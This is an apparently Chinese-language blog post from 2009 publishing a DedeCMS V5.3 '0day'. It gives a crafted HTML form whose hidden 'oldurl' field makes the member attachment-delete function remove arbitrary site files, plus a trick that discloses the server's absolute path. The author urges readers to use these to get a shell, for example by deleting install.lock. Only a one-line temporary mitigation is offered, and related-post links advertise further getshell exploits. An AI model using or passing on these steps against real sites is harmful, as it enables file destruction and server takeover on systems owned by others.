dedecms v5.3 0day

2009, October 28, 3:20 PM. 漏洞集研
Submitted by admin

1.删除网站任意文件.
2.爆绝对路径
影响系统 = DedeCMS V5.3

1.删除任意文件.
注册正常用户...随意找个地方上传个附件就OK.
部分代码:
复制代码
<form class="mTB10 mL10 mR10" name="form1" action="http://网站地址/member/uploads_edit.php" method="post" enctype="multipart/form-data">
      <input type="hidden" name="aid" value="28" />
      <input type="hidden" name="mediatype" value="1" />
      <input type="hidden" name="oldurl" value="要删除的文件" />   <!--如value="/index.php">
      <input type="hidden" name="dopost" value="save" />
      <table cellspacing="1" class="submit">


修改完毕后.打开HTML页.直接点提交.
然后在用户管理附件里点击删除.

2.爆路径.
也是利用原来的html代码..
复制代码
<td align="right" valign="top">更换附件:</td>
          <td><input name="addonfile" type="file" id="addonfile" style="width:300px" /></td>

把type="file"删除.保存.然后打开.直接点提交.

就可以爆路径了..
具体的如何利用这个漏洞拿到SHELL.就看你自己的想象力了..比如删除install.lock....比如删除用户登陆检测..

临时解决方法.:禁止用户注册.或禁止用户发附件

Tags: dedecms, oday

« 上一篇 | 下一篇 »

只显示10条记录相关文章
DeDecms xss 通杀0day 附getshell EXP (浏览: 27862, 评论: 0)
ecshop最新版(v272) 本地包含漏洞ODAY(鸡肋) (浏览: 16093, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35445, 评论: 0)
dedecms默认的注册用户 (浏览: 12968, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13760, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16390, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37599, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 22239, 评论: 0)
dedecms 5.6 RSS订阅页面注入漏洞 (浏览: 11171, 评论: 0)
V5-SHOP商城0day (浏览: 9533, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):